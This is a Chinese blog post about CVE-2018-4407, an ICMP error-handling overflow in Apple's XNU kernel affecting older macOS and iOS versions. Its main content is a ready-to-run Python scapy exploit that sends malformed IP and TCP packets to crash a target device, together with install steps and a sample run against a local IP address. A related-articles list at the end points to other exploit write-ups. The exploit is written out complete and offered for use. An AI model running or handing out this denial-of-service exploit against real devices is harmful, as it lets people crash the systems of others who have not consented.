CVE-2018-4407 苹果设备远程溢出漏洞
2018-10-30 公开了一个 Apple 设备的远程代码执行漏洞 CVE-2018-4407,该漏洞是收到畸形数据包后,向发送方报告错误,在构造 ICMP 数据包时发生了溢出,影响 macOS 10.13.6 及以下版本,iOS 11 及以下版本
python exp,能够造成让系统崩溃,代码如下:
# CVE-2018-4407 ICMP DOS
# https://lgtm.com/blog/apple_xnu_icmp_error_CVE-2018-4407
# from https://twitter.com/ihackbanme
import sys
try:from scapy.all import *
except Exception as e:print ("[*] You need install scapy first:\n[*] sudo pip install scapy ")
if __name__ == '__main__':try:check_ip = sys.argv[1]print ("[*] !!!!!!Dangerous operation!!!!!!")print ("[*] Trying CVE-2018-4407 ICMP DOS " + check_ip)for i in range(8,20):send(IP(dst=check_ip,options=[IPOption("A"*i)])/TCP(dport=2323,options=[(19, "1"*18),(19, "2"*18)]))print ("[*] Check Over!! ")except Exception as e:print "[*] usage: sudo python check_icmp_dos.py 127.0.0.1"
测试 exp 之前安装一下 scapy
sudo pip install scapy
然后开始见证奇迹:
$ sudo python ./icmp_ddos.py 192.168.2.238
Fontconfig warning: ignoring UTF-8: not a valid region tag
Fontconfig warning: ignoring UTF-8: not a valid region tag
[*] !!!!!!Dangerous operation!!!!!!
[*] Trying CVE-2018-4407 ICMP DOS 192.168.2.238
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
[*] Check Over!!
原文地址:https://www.exchen.net/apple_xnu_icmp_error_cve-2018-4407.html
CVE-2018-4407 苹果设备远程溢出漏洞相关推荐
- 【漏洞复现】永恒之蓝 MS17-010 远程溢出漏洞(CVE-2017-0143)
文章目录 声明 前言 一.漏洞原理简述 二.漏洞代码深层解析 三.实验步骤 四.漏洞补丁 总结 声明 本篇文章仅用于技术研究与技术学习,切勿用于非授权下攻击行为,切记! 前言 Windows7 存在 ...
- 利用MS08067远程溢出漏洞抓肉鸡
利用MS08067远程溢出漏洞抓肉鸡 陈小兵 [antian365.com] 微软的正版验证机会出来以后没有多久,就爆出针对台湾和简体中文版本的MS08067漏洞,这个时候微软主动爆出这个号称比冲击波 ...
- 一步到位的 UPnP 远程溢出漏洞实战
远程溢出***漏洞 (Remote Buffer Overflow Vulnerability) 是远程直接***被黑 电脑或服务器最典型.最常见的漏洞,原因无它,只要溢出成功并运行 ShellCod ...
- linux远程溢出,Linux netkit in.telnetd远程溢出漏洞
Linux netkit in.telnetd远程溢出漏洞 2008-04-09 04:30:32来源:互联网 阅读 () Linux netkit in.telnetd远程溢出漏洞 发布日期:200 ...
- c++ c6386 缓冲区 溢出_Office 远程溢出漏洞测试与分析
本文作者:ghostkeeper(信安之路首次投稿作者) 获得奖励:加入信安之路核心群+免费邀请加入信安之路知识星球+免费获取 90sec 论坛邀请码 在 2017 年 11 月,微软发布的 11 月 ...
- 网安学习日记-永恒之蓝MS17-010远程溢出漏洞学习(CVE-2017-0143)
一.漏洞原理简介 MS17-010漏洞出现在Windows SMB v1中的内核态函数srv!SrvOs2FeaListToNt在处理FEA(File Extended Attributes)转换时, ...
- 方式程0day MS17-010远程溢出漏洞测试
最近那个WannaCry勒索病毒搞的沸沸扬扬,据了解该病毒利用了方程式泄露的0day MS17-010(永恒之蓝)进行传播. 据说这个漏洞是支持winxp-win2012,测试一下这个漏洞到底如何. ...
- 方程式ETERNALBLUE:Windows SMB远程溢出漏洞复现笔记
0x01 环境搭建 win2003 攻击机,ip:192.168.0.28 kali 攻击机,ip:192.168.0.27 win7 靶机,ip:192.168.0.14:netstat -an ...
- 绿盟科技网络安全威胁周报2017.01 请关注MatrixSSL堆缓冲区溢出漏洞CVE-2016-6890
绿盟科技发布了本周安全通告,周报编号NSFOCUS-16-39,绿盟科技漏洞库本周新增30条,其中高危9条.本次周报建议大家关注 MatrixSSL 堆缓冲区溢出漏洞 ,目前,此漏洞已经公布了一段时间 ...
最新文章
- rsa加密算法java实例,java实现的RSA加密算法详解
- PChar 类型的又一些用法
- 结对和团队项目建议 - 黄金点游戏
- (五)构建和训练深度伪造自动编码器
- SAP License:写给想入行或是想转行的朋友们
- SAP License:SAP中的报表查询
- getHandel redis_redis 使用 get 命令读取 bitmap 类型的数据
- 领导公开对你有成见,关键在于是否影响公司决策
- mysql把字段拆成两个_MySQL数据库中,将一个字段的值分割成多条数据显示
- 斯皮尔曼相关系数范围_斯皮尔曼相关系数
- 【Qt象棋游戏】05_象棋走棋规则——象、马、将、兵
- 鼠标事件界面转换 mouseover() 方法
- 怎么转换视频格式,视频格式不符如何转换?
- “程序猿”面试篇(一)聊项目
- 第九讲:因子分析(Factor analysis)
- 系统接口对接:(1)
- java中强耦合是什么意思_什么是Java程序的耦合
- 有些不知道自己应该做些什么
- 副业推荐不上班!12小时删!某宝付费买的资源,请低调使用~
- pdfjs预览pdf报错
热门文章
- SQL SERVER CLR Trigger功能
- Docker ASP.NET Core (5):Docker Compose
- flask的第一个hello word 程序
- 参数的范数正则/惩罚(parameter norm penalties)
- iOS的runtime运行时机制
- win系统注册缺少的库 32位系统 64位系统
- [转]Oracle update用例
- [网络安全自学篇] 三.Burp Suite安装配置、Proxy基础用法及流量分析示例
- iOS之从OpenGL深入探究离屏渲染及性能优化
- Python生成列表的所有子集